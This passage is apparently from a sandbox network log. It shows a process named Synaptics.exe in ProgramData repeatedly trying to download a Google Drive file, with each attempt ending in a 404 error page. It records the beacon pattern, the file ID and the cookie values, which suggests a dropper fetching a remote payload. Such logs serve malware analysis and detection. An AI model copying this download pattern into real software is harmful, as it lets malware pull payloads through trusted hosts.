                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_FnCFEbPV2xlZebV7Ifz5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            31192.168.2.849774142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:19 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5uMXZaWKo8OSbt-Gufc0vAw4CjyATnzNdoVOuV5MxEIAzOarak5NFrLhV1uwfqAKSLWQXBaO4
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-anw75W2Z8RTAExN_miqBKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:19 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:19 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 68 41 36 50 49 73 6d 75 4b 78 5f 52 79 4a 45 6a 58 44 38 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="chA6PIsmuKx_RyJEjXD8sw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:19 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            32192.168.2.849773142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:19 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-xVsVaG9gYu0uTYGWMoCScg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            33192.168.2.849778142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7nq3ie3sCGiqAw6NBRXuADWysTFG4vtjmkwPjav_8PJwv5TtZvxIGM9bVk2o9THE73OM_7BsQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EP0hyBAuVZ_T3BJkXo8IqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 65 52 37 77 62 42 45 56 53 37 5f 57 53 53 52 4c 68 57 4a 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="TeR7wbBEVS7_WSSRLhWJdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            34192.168.2.849779142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Dvu04cJiIlbMJmMzlSgGfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            35192.168.2.849780142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-oaNRYPcqvnyVEgAwaEs_zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            36192.168.2.849781142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:20 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC56cKeQm4BOcXEY4uZL58k4wMgbKVPNtAYUaqP45QFbEGoU7PQ7JyPSLEXpu3yUEinhTj3qh5g
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-T31ncOEkBRHxaV7vhxfjuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:20 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:20 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6b 54 6e 61 48 76 61 52 33 77 53 61 49 6e 71 6c 48 52 30 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="ZkTnaHvaR3wSaInqlHR0pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:20 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            37192.168.2.849785142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
